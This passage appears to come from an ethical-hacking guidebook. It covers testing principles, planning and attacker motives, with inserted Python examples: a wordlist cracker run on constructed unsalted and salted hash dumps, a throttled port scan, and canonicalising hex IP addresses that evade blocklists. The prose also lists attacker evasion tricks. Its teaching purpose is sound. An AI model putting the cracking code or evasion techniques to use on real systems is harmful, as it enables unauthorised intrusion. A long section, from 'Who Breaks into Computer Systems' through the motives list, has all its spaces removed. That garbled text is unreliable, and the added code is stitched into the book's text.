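def crack_unsalted(dump: Dict[str, str], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """Invert the dump once; then one hash per candidate covers every account."""
    users_by_hash: Dict[str, List[str]] = {}
    for user, digest in dump.items():
        users_by_hash.setdefault(digest, []).append(user)
    found: Dict[str, str] = {}
    hashes_computed = 0
    for word in wordlist:
        for cand in mangle(word):
            hashes_computed += 1
            for user in users_by_hash.get(sha256_hex(cand), []):
                found[user] = cand
    return found, hashes_computed


def crack_salted(dump: Dict[str, Tuple[bytes, bytes]], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """Salts force a fresh derivation per candidate *per account*."""
    found: Dict[str, str] = {}
    derivations = 0
    for user, (salt, digest) in dump.items():
        for word in wordlist:
            for cand in mangle(word):
                derivations += 1
                if hmac.compare_digest(pbkdf2(cand, salt), digest):
                    found[user] = cand
                    break
            if user in found:
                break
    return found, derivations


def demo() -> dict:
    """Crack a constructed three-account dump under both schemes."""
    creds = {"alice": "Summer2016", "bob": "letmein",
             "carol": "correct horse battery staple"}   # carol is not in the wordlist
    unsalted, salted = make_dumps(creds)
    found_u, n_u = crack_unsalted(unsalted, WORDLIST)
    found_s, n_s = crack_salted(salted, WORDLIST)
    return {"unsalted": found_u, "unsalted_hashes": n_u,
            "salted": found_s, "salted_derivations": n_s}


if __name__ == "__main__":
    print(demo())
```

crack_unsalted() computes 90 hashes for the whole dump; crack_salted() needs 157 derivations for the same three accounts, and each of those is 10,000 times slower than a bare SHA-256. That is the whole point of per-user salts plus a slow, iterated derivation: they turn a wordlist attack from a single lookup into real work per account.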

Application and other specialized attacks

Applications take a lot of hits by hackers. Programs (such as e-mail server software and web applications) are often beaten down. For example:

- Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol (SMTP) applications are frequently attacked because most firewalls and other security mechanisms are configured to allow full access to these services to and from the Internet, even when running with SSL (yuck!) or Transport Layer Security (TLS) encryption.
- Mobile apps face increasing attacks given their prevalence in business settings.
- Unsecured files containing sensitive information are scattered across workstation and server shares.
- Database systems also contain numerous vulnerabilities that malicious users can exploit.

Obeying the Ethical Hacking Principles

Security professionals must carry out the same attacks against computer systems, physical controls, and people that malicious hackers do. (I introduce those attacks in the preceding section.) A security professional’s intent, however, is to highlight any associated weaknesses. Parts II through V of this book cover how you might proceed with these attacks in detail, along with specific countermeasures you can implement against attacks against your business.

To ensure his or her security testing is performed adequately and professionally, every security professional must abide by a few basic tenets. The following sections introduce the principles you need to follow.

If you don’t heed the following principles, bad things can happen. I’ve seen them ignored or forgotten when planning or executing security tests. The results weren’t positive — trust me.

Working ethically

The word ethical in this context means working with high professional morals and values. Whether you’re performing security tests against your own systems or for someone who has hired you, everything you do must be aboveboard in support of the company’s goals. No hidden agendas allowed! This also includes reporting all your findings regardless of whether or not it will create political backlash.

Trustworthiness is the ultimate tenet. It’s also the best way to get (and keep) people on your side in support of your security program. The misuse of information is absolutely forbidden. That’s what the bad guys do. Let them receive a fine or go to prison because of their poor choices. Keep in mind that you can be ethical but not trustworthy and vice versa, along the lines of Edward Snowden.

Respecting privacy

Treat the information you gather with the utmost respect. All information you obtain during your testing — from web application flaws to cleartext e-mail passwords to personally identifiable information (PII) and beyond — must be kept private. Nothing good can come of snooping into confidential corporate information or employees’ private lives.

Involve others in your process. Employ a watch-the-watchers system that can help build trust and support for your security assessment projects. Documentation is key, so document, document, document!

Not crashing your systems

One of the biggest mistakes I’ve seen people make when trying to test their own systems is inadvertently crashing the systems they’re trying to keep running. It doesn’t happen as much as it used to, given the resiliency of today’s systems. However, poor planning and timing can have negative consequences.

Although it’s not likely, you can create DoS conditions on your systems when testing. Running too many tests too quickly can cause system lockups, data corruption, reboots, and more. This is especially true when testing websites and applications. I should know: I’ve done it! Don’t rush and assume that a network or specific host can handle the beating that network tools and vulnerability scanners can dish out.

You can even accidentally create an account lockout or a system lockout condition by using vulnerability scanners or by socially engineering someone into changing a password, not realizing the consequences of your actions. Proceed with caution and common sense. Either way, be it you or someone else, these weaknesses still exist, and it’s better that you discover them first!

Many vulnerability scanners can control how many tests are performed on a system at the same time. These settings are especially handy when you need to run the tests on production systems during regular business hours. Don’t be afraid to throttle back your scans. It will take longer to complete your testing, but it can save you a lot of grief.
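As an added illustration (not from the book) of what those throttle settings do under the hood, the following Python script wraps a plain TCP connect check in the two limits most scanners expose: a cap on concurrent tests and a minimum spacing between tests. It scans only loopback ports and opens one listener of its own for the demo; the class and function names are mine, not any scanner’s.

```python
"""Throttling your own tests so they do not knock over the target.

Added example, not from the book: a TCP connect check run under a
concurrency cap and a pacing limit, the two knobs a vulnerability scanner
usually exposes as settings. The demo scans loopback only; the listener it
opens is constructed for the demo.
"""
import socket
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable


class Pacer:
    """Enforce a minimum spacing between tests, shared by all worker threads."""

    def __init__(self, tests_per_second: float):
        self._interval = 1.0 / tests_per_second
        self._next_allowed = time.monotonic()
        self._lock = threading.Lock()

    def wait(self) -> None:
        # Reserve the next slot under the lock, then sleep outside it so other
        # workers can queue behind us without serialising the sleep.
        with self._lock:
            now = time.monotonic()
            slot = max(now, self._next_allowed)
            self._next_allowed = slot + self._interval
        time.sleep(max(0.0, slot - now))


def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """A single, non-intrusive test: can we complete a TCP handshake?"""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def throttled_scan(host: str, ports: Iterable[int], max_parallel: int = 2,
                   tests_per_second: float = 10.0) -> Dict[int, bool]:
    """Run port_open() over `ports` under a concurrency cap and a pacing limit."""
    pacer = Pacer(tests_per_second)

    def paced_check(port: int) -> bool:
        pacer.wait()                    # spacing is enforced before every test
        return port_open(host, port)

    port_list = list(ports)
    with ThreadPoolExecutor(max_workers=max_parallel) as pool:
        return dict(zip(port_list, pool.map(paced_check, port_list)))


def demo() -> dict:
    """Scan one open and five closed loopback ports with throttling on."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    # Reserve five distinct ephemeral ports, then release them so they are closed.
    holders = [socket.socket(socket.AF_INET, socket.SOCK_STREAM) for _ in range(5)]
    for s in holders:
        s.bind(("127.0.0.1", 0))
    closed = [s.getsockname()[1] for s in holders]
    for s in holders:
        s.close()
    try:
        start = time.monotonic()
        results = throttled_scan("127.0.0.1", [open_port] + closed,
                                 max_parallel=2, tests_per_second=10.0)
        elapsed = time.monotonic() - start
    finally:
        listener.close()
    return {"open_port": open_port, "results": results, "elapsed": elapsed}


if __name__ == "__main__":
    print(demo())
```

Six ports at ten tests per second take at least half a second even with two workers, because the pacer, not the thread pool, sets the floor. Against a real host you would lower both tests_per_second and max_parallel for fragile targets, and for anything that exercises logins you would additionally cap attempts per account below the lockout threshold.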

Using the Ethical Hacking Process

Like practically any IT or security project, you need to plan your security testing. It’s been said that action without planning is at the root of every failure. Strategic and tactical issues in the ethical hacking process need to be determined and agreed upon. To ensure the success of your efforts, spend time up front planning for any amount of testing — from a simple OS password-cracking test against a few servers to an all-out vulnerability assessment of a web environment.

If you choose to hire a “reformed” hacker to work with you during your testing or to obtain an independent perspective, be careful. I cover the pros and cons, and the do’s and don’ts associated with hiring trusted and not-so-trusted ethical hacking resources in Chapter 19.

Formulating your plan

Getting approval for security testing is essential. Make sure that what you’re doing is known and visible — at least to the decision makers. Obtaining sponsorship of the project is the first step. This is how your testing objectives will be defined. Sponsorship could come from your manager, an executive, your client, or even yourself if you’re the boss. You need someone to back you up and sign off on your plan. Otherwise, your testing might be called off unexpectedly if someone (including third parties such as cloud service and hosting providers) claims you were never authorized to perform the tests. Even worse, you get fired or charged with criminal activity — it has happened!

The authorization can be as simple as an internal memo or an e-mail from your boss when you perform these tests on your own systems. If you’re testing for a client, have a signed contract stating the client’s support and authorization. Get written approval on this sponsorship as soon as possible to ensure that none of your time or effort is wasted. This documentation is your “Get Out of Jail Free” card if anyone such as your Internet Service Provider (ISP), cloud service provider, or related vendor questions what you’re doing, or worse, if the authorities come calling. Don’t laugh — it wouldn’t be the first time it has happened.

One slip can crash your systems — not necessarily what anyone wants. You need a detailed plan, but that doesn’t mean you need volumes of testing procedures to make things overly complex. A well-defined scope includes the following information:

Specific systems to be tested: When selecting systems to test, start with the most critical systems and processes or the ones you suspect are the most vulnerable. For instance, you can test server OS passwords, test an Internet-facing web application, or attempt social engineering via e-mail phishing before drilling down into all your systems.

Risks involved: Have a contingency plan for your ethical hacking process in case something goes awry. What if you’re assessing your firewall or web application and you take it down? This can cause system unavailability, which can reduce system performance or employee productivity. Even worse, it might cause loss of data integrity, loss of data itself, and even bad publicity. It’ll most certainly tick off a person or two and make you look bad.

Handle social engineering and DoS attacks carefully. Determine how they affect the people and systems you test.

Dates the tests will be performed and your overall timeline: Determining when the tests are performed is something you must think long and hard about. Do you perform tests during normal business hours? How about late at night or early in the morning so that production systems aren’t affected? Involve others to make sure they approve of your timing.

You may get pushback and suffer DoS-related consequences, but the best approach is an unlimited attack, where any type of test is possible at any time of day. The bad guys aren’t breaking into your systems within a limited scope, so why should you? Some exceptions to this approach are performing all-out DoS attacks, social engineering, and physical security tests.

Whether or not you intend to be detected: One of your goals might be to perform the tests without being detected. For example, you might perform your tests on remote systems or on a remote office and you might not want the users to be aware of what you’re doing. Otherwise, the users or IT staff might catch on to you and be on their best behavior — instead of their normal behavior.

Knowledge of the systems you have before you start testing: You don’t need extensive knowledge of the systems you’re testing — just a basic understanding. This basic understanding helps protect you and the tested systems.

Understanding the systems you’re testing shouldn’t be difficult if you’re hacking your own in-house systems. If you’re testing a client’s systems, you may have to dig deeper. In fact, I’ve only had one or two clients ask for a fully blind assessment. Most IT managers and others responsible for security are scared of these assessments — and they can take more time, cost more, and be less effective. Base the type of test you perform on your organization’s or client’s needs.

Actions you will take when a major vulnerability is discovered: Don’t stop after you find one or two security holes. Keep going to see what else you can discover. I’m not saying to keep hacking until the end of time or until you crash all your systems; ain’t nobody got time for that! Instead, simply pursue the path you’re going down until you just can’t hack it any longer (pun intended). If you haven’t found any vulnerabilities, you haven’t looked hard enough. They’re there. If you uncover something big, you need to share that information with the key players (developers, DBAs, IT managers, and so on) as soon as possible to plug the hole before it’s exploited.

The specific deliverables: This includes vulnerability scanner reports and your own distilled report outlining the important vulnerabilities to address, along with recommendations and countermeasures to implement.

Selecting tools

As with any project, if you don’t have the right tools for your security testing, you will have difficulty accomplishing the task effectively. Having said that, just because you use the right tools doesn’t mean that you’ll discover all the right vulnerabilities. Experience counts.

Know the limitations of your tools. Many vulnerability scanners generate false positives (reporting a vulnerability that isn’t really there) and false negatives (missing one that is). Others just skip right over vulnerabilities altogether. In certain situations, like when testing web applications, you’ll no doubt have to run multiple vulnerability scanners to find all of the vulnerabilities.

Many tools focus on specific tests, and no tool can test for everything. For the same reason that you wouldn’t drive a nail with a screwdriver, don’t use a port scanner to uncover specific network vulnerabilities. This is why you need a set of specific tools for the task. The more (and better) tools you have, the easier your ethical hacking efforts are.

Make sure you’re using the right tool for the task:

- To crack passwords, you need cracking tools, such as Ophcrack and Proactive Password Auditor.
- For an in-depth analysis of a web application, a web vulnerability scanner (such as Netsparker, Acunetix Web Vulnerability Scanner, or AppSpider) is more appropriate than a network analyzer (such as Wireshark or OmniPeek).

When selecting the right security tool for the task, ask around. Get advice from your colleagues and from other people online via Google, LinkedIn, and Twitter. Hundreds, if not thousands, of tools can be used for your security tests. The following list runs down some of my favorite commercial, freeware, and open source security tools:

- Cain & Abel
- OmniPeek
- Nexpose
- Netsparker
- Elcomsoft Proactive System Password Recovery
- Metasploit
- GFI LanGuard
- CommView for WiFi

I discuss these tools and many others in Parts II through V when I go into the specific tests. The Appendix contains a more comprehensive listing of these tools for your reference.

The capabilities of many security and hacking tools are often misunderstood. This misunderstanding has cast a negative light on otherwise excellent and legitimate tools. Even government agencies around the world are talking about making them illegal! Part of this misunderstanding is due to the complexity of many security testing tools. Whichever tools you use, familiarize yourself with them before you start using them. That way, you’re prepared to use the tools in the ways they’re intended to be used. Here are ways to do that:

- Read the readme and/or online Help files and FAQs.
- Study the user guides.
- Use the tools in a lab or test environment.
- Watch tutorial videos on YouTube (if you can bear the poor production on most of them).
- Consider formal classroom training from the security tool vendor or another third-party training provider, if available.

Look for these characteristics in tools for security testing:

- Adequate documentation
- Detailed reports on the discovered vulnerabilities, including how they might be exploited and fixed
- General industry acceptance
- Availability of updates and responsiveness of technical support
- High-level reports that can be presented to managers or nontechnical types (This is especially important in today’s audit- and compliance-driven world!)

These features can save you a ton of time and effort when you’re performing your tests and writing your final reports.

Executing the plan

Good security testing takes persistence. Time and patience are important. Also, be careful when you’re performing your ethical hacking tests. A criminal on your network or a seemingly benign employee looking over your shoulder might watch what’s going on and use this information against you or your business.

Making sure that no hackers are on your systems before you start isn’t practical. Be sure you keep everything as quiet and private as possible. This is especially critical when transmitting and storing your test results. If possible, encrypt any e-mails and files containing sensitive test information via an encrypted Zip file (choose AES encryption; the legacy ZipCrypto scheme is easily broken) or a cloud-based file sharing service.

You’re now on a reconnaissance mission. Harness as much information as possible about your organization and systems, much like malicious hackers do. Start with a broad view and narrow your focus:

1. Search the Internet for your organization’s name, your computer and network system names, and your IP addresses.

Google is a great place to start.

2. Narrow your scope, targeting the specific systems you’re testing.

Whether you’re assessing physical security structures or web applications, a casual assessment can turn up a lot of information about your systems.

3. Further narrow your focus with a more critical eye. Perform actual scans and other detailed tests to uncover vulnerabilities on your systems.

4. Perform the attacks and exploit any vulnerabilities you find if that’s what you choose to do.

Check out Chapters 4 and 5 to find out more information and tips on this process.

Evaluating results

Assess your results to see what you’ve uncovered, assuming that the vulnerabilities haven’t been made obvious before now. This is where knowledge counts. Your skill at evaluating the results and correlating the specific vulnerabilities discovered will get better with practice. You’ll end up knowing your systems much better than anyone else. This makes the evaluation process much simpler moving forward.

Submit a formal report to management or to your client, outlining your results and any recommendations you need to share. Keep these parties in the loop to show that your efforts and their money are well spent. Chapter 17 describes the ethical hacking reporting process.

Moving on

When you finish your security tests, you (or your client) still need to implement your recommendations to make sure the systems are secure. Otherwise, all the time, money, and effort spent on ethical hacking goes to waste. Sadly, I see this very scenario fairly often.

New security vulnerabilities continually appear. Information systems constantly change and become more complex. New security vulnerabilities and exploits are regularly uncovered. Vulnerability scanners get better and better. Security tests are a snapshot of the security posture of your systems. At any time, everything can change, especially after upgrading software, adding computer systems, or applying patches. This underscores the need to update your tools, before each use if possible. Plan to test regularly and consistently (for example, once a month, once a quarter, or biannually). Chapter 19 covers managing security changes as you move forward.

Chapter 2

Cracking the Hacker Mindset

In This Chapter

Understanding the enemy

Profiling hackers and malicious users

Understanding why attackers do what they do

Examining how attackers go about their business

Before you start assessing the security of your systems, it’s good to know a few things about the people you’re up against. Many information security product vendors and other professionals claim that you should protect your systems from the bad guys — both internal and external. But what does this mean? How do you know how these people think and execute their attacks?

Knowing what hackers and malicious users want helps you understand how they work. Understanding how they work helps you to look at your information systems in a whole new way. In this chapter, I describe the challenges you face from the people actually doing the misdeeds as well as their motivations and methods. This understanding better prepares you for your security tests.

What You’re Up Against

Thanks to sensationalism in the media, public perception of the hacker has transformed from harmless tinkerer to malicious criminal. Nevertheless, hackers often state that the public misunderstands them, which is mostly true. It’s easy to prejudge what you don’t understand. Unfortunately, many hacker stereotypes are based on misunderstanding rather than fact, and that misunderstanding fuels a constant debate.

Hackers can be classified by both their abilities and their underlying motivations. Some are skilled, and their motivations are benign; they’re merely seeking more knowledge. At the other end of the spectrum, hackers with malicious intent seek some form of personal, political, or economic gain. Unfortunately, the negative aspects of hacking usually overshadow the positive aspects and promote the negative stereotypes.

Historically, hackers hacked for the pursuit of knowledge and the thrill of the challenge. Script kiddies (hacker wannabes with limited skills) aside, traditional hackers are adventurous and innovative thinkers and are always devising new ways to exploit computer vulnerabilities. (For more on script kiddies, see the section, “Who Breaks into Computer Systems,” later in this chapter.) Hackers see what others often overlook. They have a tremendous amount of “situational awareness.” They wonder what would happen if a cable was unplugged, a switch was flipped, or lines of code were changed in a program. These old-school hackers are like Tim “The Toolman” Taylor — Tim Allen’s character on the classic sitcom Home Improvement — thinking they can improve electronic and mechanical devices by “rewiring them.”

When they were growing up, hackers’ rivals were monsters and villains on video game screens. Now hackers see their electronic foes as only that — electronic. Hackers who perform malicious acts don’t really think about the fact that human beings are behind the firewalls, wireless networks, and web applications they’re attacking. They ignore that their actions often affect those human beings in negative ways, such as jeopardizing their job security and putting their personal safety at risk. Government-backed hacking? Well, that’s a different story, as they are making calculated decisions to do these things.

On the flip side, odds are good that you have at least a handful of employees, contractors, interns, or consultants who intend to compromise sensitive information on your network for malicious purposes. These people don’t hack in the way people normally suppose. Instead, they root around in files on server shares; delve into databases they know they shouldn’t be in; and sometimes steal, modify, and delete sensitive information to which they have access. This behavior is often very hard to detect — especially given the widespread belief by management that users can and should be trusted to do the right things. This activity is perpetuated if these users passed their criminal background and credit checks before they were hired. Past behavior is often the best predictor of future behavior, but just because someone has a clean record and authorization to access sensitive systems doesn’t mean he or she won’t do anything bad. Criminal behavior has to start somewhere!

As negative as breaking into computer systems often can be, hackers and researchers play key roles in the advancement of technology. In a world without these people, odds are good that the latest intrusion prevention technology, data loss prevention (DLP), or vulnerability scanning and exploit tools would likely be different, if they even existed at all. Such a world may not be bad, but technology does keep security professionals employed and keeps the field moving forward. Unfortunately, the technical security solutions can’t ward off all malicious attacks and unauthorized use because hackers and (sometimes) malicious users are usually a few steps ahead of the technology designed to protect against their wayward actions.

However you view the stereotypical hacker or malicious user, one thing is certain: Somebody will always try to take down your computer systems and compromise information by poking and prodding where he or she shouldn’t, through denial of service (DoS) attacks or by creating and launching malware. You must take the appropriate steps to protect your systems against this kind of intrusion.

Thinking like the bad guys

Malicious attackers often think and work like thieves, kidnappers, and other organized criminals you hear about in the news every day. The smart ones constantly devise ways to fly under the radar and exploit even the smallest weaknesses that lead them to their target. The following are examples of how hackers and malicious users think and work. This list isn’t intended to highlight specific exploits that I cover in this book or tests that I recommend you carry out, but rather to demonstrate the context and approach of a malicious mindset:

- Evading an intrusion prevention system by changing their MAC address or IP address every few minutes to get further into a network without being completely blocked
- Exploiting a physical security weakness by being aware of offices that have already been cleaned by the cleaning crew and are unoccupied (and thus easy to access with little chance of getting caught), which might be made obvious by, for instance, the fact that the office blinds are opened and the curtains are pulled shut in the early morning
- Bypassing web access controls by changing a malicious site’s URL to its dotted decimal IP address equivalent and then converting it to hexadecimal for use in the web browser
- Using unauthorized software that would otherwise be blocked at the firewall by changing the default TCP port that it runs on
- Setting up a wireless “evil twin” near a local Wi-Fi hotspot to entice unsuspecting Internet surfers onto a rogue network where their information can be captured and easily manipulated
- Using an overly trusting colleague’s user ID and password to gain access to sensitive information that would otherwise be highly improbable to obtain
- Unplugging the power cord or Ethernet connection to a networked security camera that monitors access to the computer room or other sensitive areas and subsequently gaining unmonitored network access
- Performing SQL injection or password cracking against a website via a neighbor’s unprotected wireless network in order to hide the malicious user’s own identity

Malicious hackers operate in countless ways, and this list presents only a small number of the techniques hackers may use. IT and security professionals need to think and work this way in order to really dig in and find security vulnerabilities that may not otherwise be uncovered.
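The third item on that list, rewriting a host as a hex or integer address, works whenever a filter compares the URL host as a string. The following Python script is an added example, not from the book: it parses every inet_aton()-style IPv4 spelling (hex, octal, decimal, fewer than four dotted parts) back to canonical dotted decimal, and shows a naive blocklist check missing the obfuscated form while the canonicalising check catches it. The blocklist entries, URLs and function names are constructed for the demo.

```python
"""Canonicalising IPv4 literals before a web-filter comparison.

Added example, not from the book. Browsers and the C library's inet_aton()
accept an address as a dword integer, in hex or octal, or with fewer than
four parts, so a filter that compares the host string literally is
bypassable. Blocklist entries and URLs below are constructed for the demo.
"""
import re
from typing import Optional
from urllib.parse import urlsplit

# One dotted part: 0x-prefixed hex, leading-zero octal, or decimal.
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def _parse_part(text: str) -> int:
    """Parse one dotted part with inet_aton() rules."""
    if not _PART.match(text):
        raise ValueError(text)
    if text[:2].lower() == "0x":
        return int(text[2:], 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)
    return int(text, 10)


def ipv4_literal_to_int(host: str) -> Optional[int]:
    """32-bit value of an inet_aton()-style literal, or None if it is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # The last part fills all remaining bytes: a.b.c.d, a.b.c (c is 16-bit),
    # a.b (b is 24-bit), a (32-bit).
    last_bits = 8 * (5 - len(parts))
    head, tail = values[:-1], values[-1]
    if any(v > 255 for v in head) or tail >= (1 << last_bits):
        return None
    result = 0
    for v in head:
        result = (result << 8) | v
    return (result << last_bits) | tail


def canonical_host(host: str) -> str:
    """Dotted decimal for any IPv4 literal spelling; lower-cased name otherwise."""
    host = host.strip().rstrip(".").lower()
    value = ipv4_literal_to_int(host)
    if value is None:
        return host
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def naive_is_blocked(url: str, blocklist) -> bool:
    """The weak check: literal string comparison of the URL's host."""
    return (urlsplit(url).hostname or "") in blocklist


def hardened_is_blocked(url: str, blocklist) -> bool:
    """The fixed check: canonicalise both sides before comparing."""
    host = canonical_host(urlsplit(url).hostname or "")
    return host in {canonical_host(entry) for entry in blocklist}


def demo() -> dict:
    """Constructed blocklist versus a hex-encoded spelling of a blocked host."""
    blocklist = {"127.0.0.1", "203.0.113.9"}        # constructed entries
    url = "http://0x7F000001/admin"                 # 127.0.0.1 written in hex
    return {"naive": naive_is_blocked(url, blocklist),
            "hardened": hardened_is_blocked(url, blocklist),
            "canonical": canonical_host(urlsplit(url).hostname or "")}


if __name__ == "__main__":
    print(demo())
```

Anything that decides on a host string (proxy ACLs, SSRF allowlists, phishing blocklists) should canonicalise this way before comparing, and should resolve names to addresses before deciding as well, since the canonical form of a hostname is still only a string.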

WhoBreaksintoComputerSystemsComputerhackershavebeenaroundfordecades.SincetheInternetbecamewidelyusedinthe1990s,themainstreampublichasstartedtohearmoreandmoreabouthacking.Onlyafewhackers,suchasJohnDraper(alsoknownasCaptainCrunch)andKevinMitnick,arereallywellknown.Manymoreunknownhackersarelookingtomakeanameforthemselves.They’retheonesyouhavetolookoutfor.

Inaworldofblackandwhite,describingthetypicalhackeriseasy.Thehistoricalstereotypeofahackerisanantisocial,pimplyfaced,teenageboy.Buttheworldhasmanyshadesofgrayandmanytypesofpeopledoingthehacking.Hackersareuniqueindividuals,soanexactprofileishardtooutline.Thebestbroaddescriptionofhackersisthatallhackersaren’tequal.Eachhackerhashisorherownuniquemotives,methods,andskills.Hackerskilllevelsfallintothreegeneralcategories:

Scriptkiddies:Thesearecomputernoviceswhotakeadvantageoftheexploittools,vulnerabilityscanners,anddocumentationavailablefreeontheInternetbutwhodon’thaveanyrealknowledgeofwhat’sreallygoingonbehindthescenes.Theyknowjustenoughtocauseyouheadachesbuttypicallyareverysloppyintheiractions,leavingallsortsofdigitalfingerprintsbehind.Eventhoughtheseguysareoftenthestereotypicalhackersthatyouhearaboutinthenewsmedia,theyneedonlyminimalskillstocarryouttheirattacks.

Criminalhackers:Oftenreferredtoas“crackers,”theseareskilledcriminalexpertswhowritesomeofthehackingtools,includingthescriptsandotherprogramsthatthescriptkiddiesandsecurityprofessionalsuse.Thesefolksalsowritemalwaretocarryouttheirexploitsfromtheothersideoftheworld.Theycanbreakintonetworksandcomputersandcovertheirtracks.Theycanevenmakeitlooklikesomeoneelsehackedtheirvictims’systems.Sometimes,peoplewithillintentmaynotbedoingwhat’sconsidered“hacking,”butnevertheless,they’reabusingtheirprivilegesorsomehowgainingunauthorizedaccess—suchasthe2015incidentinvolvingMajorLeagueBaseball’sSt.LouisCardinalsandHoustonAstros.Thus,themediaglorifiesitallas“hacking.”

Advancedhackersareoftenmembersofcollectivesthatprefertoremainnameless.Thesehackersareverysecretiveandshareinformationwiththeirsubordinates(lower-rankedhackersinthecollectives)onlywhentheyaredeemedworthy.Typically,forlower-rankedhackerstobeconsideredworthy,theymustpossesssomeuniqueinformationortakethegang-likeapproachandprovethemselvesthroughahigh-profilehack.ThesehackersarearguablysomeofyourworstenemiesinIT.(Okay,maybethey’renotasbadasuntrainedandcarelessusers,butclose.)Byunderstandingcriminalhackerbehavioryouaresimplybeingproactive—findingproblemsbeforetheybecomeproblems.

Securityresearchers:Thesepeoplearehighlytechnicalandpubliclyknownsecurityexpertswhonotonlymonitorandtrackcomputer,network,andapplication

vulnerabilitiesbutalsowritethetoolsandothercodetoexploitthem.Iftheseguysdidn’texist,securityprofessionalswouldn’thavemuchinthewayofopensourceandevencertaincommercialsecuritytestingtools.Ifollowmanyofthesesecurityresearchersonaweeklybasisviatheirblogs,Twitter,andarticles,andyoushould,too.Youcanreviewmyblog(http://securityonwheels.blogspot.com),andIlistothersourcesthatyoucanbenefitfromintheAppendix.Followingtheprogressofthesesecurityresearchershelpsyoustayup-to-dateonbothvulnerabilitiesandthelatestandgreatestsecuritytools.IlistthetoolsandrelatedresourcesfromvarioussecurityresearchersintheAppendixandthroughoutthebook.

Therearegood-guy(whitehat)andbad-guy(blackhat)hackers.Grayhathackersarealittlebitofboth.Therearealsoblue-hathackerswhoareinvitedbysoftwaredeveloperstofindsecurityflawsintheirsystems.

IoncesawastudyfromtheBlackHatsecurityconferencethatfoundthateverydayITprofessionalsevenengageinmaliciousandcriminalactivityagainstothers.AndpeoplewonderwhyITdoesn’tgettherespectitdeserves!Perhapsthisgroupwillevolveintoafourthgeneralcategoryofhackersinthecomingyears.

Regardlessofageandcomplexion,hackerspossesscuriosity,bravado,andoftenverysharpminds.

Perhapsmoreimportantthanahacker’sskilllevelishisorhermotivation:

Hacktiviststrytodisseminatepoliticalorsocialmessagesthroughtheirwork.Ahacktivistwantstoraisepublicawarenessofanissueyettheywanttoremainanonymous.Inmanysituations,thesehackerswilltrytotakeyoudownifyouexpressaviewthat’scontrarytotheirs.ExamplesofhacktivismarethewebsitesthatweredefacedwiththeFreeKevinmessagesthatpromotedfreeingKevinMitnickfromprisonforhisfamoushackingescapades.Otherscasesofhacktivismincludemessagesaboutlegalizingdrugs,protestsagainstthewar,protestscenteredaroundwealthenvyandbigcorporations,andjustaboutanyothersocialandpoliticalissueyoucanthinkof.Cyberterrorists(bothorganizedandunorganized,oftenbackedbygovernmentagencies)attackcorporateorgovernmentcomputersandpublicutilityinfrastructures,suchaspowergridsandair-trafficcontroltowers.Theycrashcriticalsystems,stealclassifieddata,orexposethepersonalinformationofgovernmentemployees.Countriestakethethreatsthesecyberterroristsposesoseriouslythatmanymandateinformationsecuritycontrolsincrucialindustries,suchasthepowerindustry,toprotectessentialsystemsagainsttheseattacks.HackersforhirearepartoforganizedcrimeontheInternet.ManyofthesehackershireoutthemselvesortheirDoS-creatingbotnetsformoney—andlotsofit!

Criminalhackersareintheminority,sodon’tthinkthatyou’reupagainstmillionsofthesevillains.Likethee-mailspamkingsoftheworld,manyofthenefariousactsfrommembersofcollectivesthatprefertoremainnamelessarecarriedoutbyasmallnumberofcriminals.Manyotherhackersjustlovetotinkerandonlyseekknowledgeofhowcomputersystemswork.Oneofyourgreatestthreatsworksinsideyourbuildingandhasanaccessbadgetothebuildingandavalidnetworkaccount,sodon’tdiscounttheinsiderthreat.

Why They Do It

Hackers hack because they can. Period. Okay, it goes a little deeper than that. Hacking is a casual hobby for some hackers — they hack just to see what they can and can’t break into, usually testing only their own systems. These aren’t the folks I write about in this book. I focus on those hackers who are obsessive about gaining notoriety or defeating computer systems, and those who have criminal intentions.

Many hackers get a kick out of outsmarting corporate and government IT and security administrators. They thrive on making headlines and being notorious. Defeating an entity or possessing knowledge that few other people have makes them feel better about themselves, building their self-esteem. Many of these hackers feed off the instant gratification of exploiting a computer system. They become obsessed with this feeling. Some hackers can’t resist the adrenaline rush they get from breaking into someone else’s systems. Often, the more difficult the job is, the greater the thrill is for hackers.

It’s a bit ironic given their collective tendencies but hackers often promote individualism — or at least the decentralization of information — because many believe that all information should be free. They think their attacks are different from attacks in the real world. Hackers may easily ignore or misunderstand their victims and the consequences of hacking. They don’t think long-term about the choices they’re making today. Many hackers say they don’t intend to harm or profit through their bad deeds, a belief that helps them justify their work. Many don’t look for tangible payoffs. Just proving a point is often a sufficient reward for them. The word sociopath comes to mind.

The knowledge that malicious attackers gain and the self-esteem boost that comes from successful hacking might become an addiction and a way of life. Some attackers want to make your life miserable, and others simply want to be seen or heard. Some common motives are revenge, basic bragging rights, curiosity, boredom, challenge, vandalism, theft for financial gain, sabotage, blackmail, extortion, corporate espionage, and just generally speaking out against “the man.” Hackers regularly cite these motives to explain their behavior, but these motivations tend to be cited more commonly during difficult economic conditions.

Malicious users inside your network may be looking to gain information to help them with personal financial problems, to give them a leg up over a competitor, to seek revenge on their employers, to satisfy their curiosity, or to relieve boredom.

Many business owners and managers — even some network and security administrators — believe that they don’t have anything that a hacker wants or that hackers can’t do much damage if they break in. They’re sorely mistaken. This dismissive kind of thinking helps support the bad guys and promote their objectives. Hackers can compromise a seemingly unimportant system to access the network and use it as a launching pad for attacks on other systems, and many people would be none the wiser because they don’t have the proper controls to prevent and detect malicious use.

Remember that hackers often hack simply because they can. Some hackers go for high-profile systems, but hacking into anyone’s system helps them fit into hacker circles. Hackers exploit many people’s false sense of security and go for almost any system they think they can compromise. Electronic information can be in more than one place at the same time, so if hackers merely copy information from the systems they break into, it’s tough to prove that hackers possess that information and it’s impossible to get it back.

